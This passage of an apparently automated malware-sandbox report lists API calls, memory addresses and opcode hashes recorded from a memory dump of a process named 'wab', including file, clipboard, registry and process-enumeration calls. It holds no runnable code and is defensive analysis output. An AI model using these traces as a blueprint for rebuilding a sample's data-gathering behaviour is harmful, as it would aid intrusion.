                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                  • String ID:
                                                  • API String ID: 4232544981-0
                                                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$FileModuleName
                                                  • String ID:
                                                  • API String ID: 3859505661-0
                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                  • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                  • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: EnumNamesResource
                                                  • String ID:
                                                  • API String ID: 3334572018-0
                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CloseFind
                                                  • String ID:
                                                  • API String ID: 1863332320-0
                                                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                  • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                  • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004095FC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                    • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                    • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 3655998216-0
                                                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00445426
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                  • String ID:
                                                  • API String ID: 1828521557-0
                                                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID:
                                                  • API String ID: 2081463915-0
                                                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                  • String ID:
                                                  • API String ID: 2136311172-0
                                                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@
                                                  • String ID:
                                                  • API String ID: 1936579350-0
                                                  • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                  • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • EmptyClipboard.USER32 ref: 004098EC
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                  • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                  • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                  • GetLastError.KERNEL32 ref: 0040995D
                                                  • CloseHandle.KERNEL32(?), ref: 00409969
                                                  • GetLastError.KERNEL32 ref: 00409974
                                                  • CloseClipboard.USER32 ref: 0040997D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                  • String ID:
                                                  • API String ID: 2565263379-0
                                                  • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                  • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                  • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                  • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
